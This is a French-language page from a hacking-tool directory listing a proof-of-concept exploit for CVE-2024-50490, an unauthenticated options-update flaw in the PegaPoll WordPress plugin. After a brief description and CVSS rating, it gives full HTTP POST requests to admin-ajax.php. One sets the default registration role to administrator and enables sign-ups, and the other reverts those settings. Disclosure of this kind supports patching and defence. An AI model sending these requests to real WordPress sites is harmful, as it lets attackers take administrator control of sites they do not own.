Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-50490 — PegaPoll <= 1.0.2 - Mise à jour non authentifiée d'options arbitraires | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-50490
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubrandomrobbiebf/cve-2024-50490

CVE-2024-50490

PegaPoll <= 1.0.2 - Mise à jour non authentifiée d'options arbitraires

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-50490

PegaPoll <= 1.0.2 - Mise à jour non authentifiée d'options arbitraires

Description :

Le plugin PegaPoll pour WordPress est vulnérable à une modification non autorisée de données pouvant conduire à une élévation de privilèges en raison d'un contrôle de capacité manquant dans toutes les versions jusqu'à la version 1.0.2 incluse. Cela permet à des attaquants non authentifiés de mettre à jour des options arbitraires sur le site WordPress. Cela peut être exploité pour modifier le rôle par défaut d'inscription en administrateur et activer l'inscription des utilisateurs, permettant ainsi aux attaquants d'obtenir un accès administrateur au site vulnérable.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50490
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: pegapoll

POC

Activer l'inscription et définir le nouvel administrateur par défaut

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 91
Origin: http://kubernetes.docker.internal
Connection: keep-alive

action=update_all_options&options[default_role]=administrator&options[users_can_register]=1

Revenir en arrière pour désactiver l'inscription et définir l'utilisateur comme abonné

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 91
Origin: http://kubernetes.docker.internal
Connection: keep-alive

action=update_all_options&options[default_role]=subscriber&options[users_can_register]=0
Télécharger l’outil